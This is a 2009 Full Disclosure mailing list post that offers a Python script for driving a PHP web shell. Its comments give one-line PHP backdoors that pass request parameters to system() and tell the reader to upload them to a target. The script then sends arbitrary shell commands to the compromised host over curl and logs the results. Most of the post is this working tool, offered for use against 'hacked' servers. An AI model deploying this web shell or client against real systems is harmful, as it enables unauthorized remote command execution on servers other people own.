Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Interactive HTTP GET and POST Shell -- R.I.P str0ke
From: malformation () hushmail me
Date: Thu, 05 Nov 2009 00:41:14 +1100

Nothing new here, but thought this might be useful to some 
people...Tries to maintain current working directory when you use 
'cd'.

http://codepad.org/POrCafnA

R.I.P str0ke

#!/usr/bin/python
#
# Malformation's Interactive HTTP GET and POST Shell - 
fireinthehole.py
#
# Upload something like this to a php file:
# <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>
# <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke and some Aussies
# Please don't strip the credits out if you modify or redistribute.

import sys, os, time

print '''
        Malformation's Interactive HTTP GET and POST Shell
        Version - 1.0.0a

        Tries to maintain current working directory when you use 'cd'.
        
        Usage:
        \tEnter the host => hacked.com/hacked.php
        \tEnter the POST variable => cmd
        \thacked.com/hacked.php# ls -la
        \ttotal 12880
        \tdrwxr-xr-x  2 web    web        4096 2009-11-03 11:54 .
        \tdrwxr-xr-x 15 root    root        4096 2009-10-08 13:37 ..
        \t-rw-r--r--  1 web    web         481 2009-11-02 18:58 hacked.php
        \thacked.com/hacked.php# .
        \tBye.
'''

# # # # # Configuration # # # # # #
# 0 to turn off curl verbosity    #
debug = 1                         #
# # # # # # # # # # # # # # # # # #

write = 0
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]
curl_dirs = ""
count = 0
finalcommand = ""
dir_array = []

for i in range(0,len(curl_array)):
        if (os.path.exists(curl_array[i] + "curl")):
                count = count + 1
                curl_dirs = curl_dirs + curl_array[i] + " "

if (count == 0):
        print "Couldn't find curl. Tried looking in " + curl_dirs
        sys.exit(0)
        
try:
        if (os.path.exists("fireinthehole.txt")):
                file = open("fireinthehole.txt","a")
        else:
                file = open("fireinthehole.txt","w")
        print "Output will be saved to fireinthehole.txt"
        write = 1
except IOError:
        print "Directory not writable, output will not be saved."

try:
        host = raw_input("Enter the host => ")
        method = raw_input("GET/POST => ")
        if (method == "GET"):
                myvar = raw_input("Enter the GET variable => ")
        elif (method == "POST"):
                myvar = raw_input("Enter the POST variable => ")
        else:
                sys.exit(0)
        while True:
                mycommand = raw_input(host + "# ")
                finalcommand = ""
                if (mycommand == "."):
                        print "Bye."
                        sys.exit(0)
                mycommand = mycommand + "; "
                if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
                        dir_array.insert(len(dir_array) + 1, mycommand)
                        if (method == "GET"):
                                string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + 
"\""
                        else:
                                string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + 
host
                        if (debug == 1):
                                print string + ":\n"
                        continue
                if (len(dir_array) != 0):
                        for j in range(0,len(dir_array)):
                                finalcommand = finalcommand + dir_array[j]
                        finalcommand = finalcommand + mycommand
                if (finalcommand != ""):
                        mycommand = finalcommand
                if (method == "GET"):
                        string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + 
"\""
                else:
                        string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
                if (debug == 1):
                        print string + ":\n"
                command = os.popen(string,"r")
                if (write == 1):
                        file.write(host + "# " + mycommand + "\n")
                while(1):
                        line = command.readline()
                        line = line.strip()
                        if line:
                                print line
                                if (write == 1):
                                        file.write(line + "\n")
                        else:
                                break
except KeyboardInterrupt:
        print "\nBye."
        sys.exit(0)

except:
        print "Unhandled exception"
        sys.exit(0)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Interactive HTTP GET and POST Shell -- R.I.P str0ke malformation (Nov 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault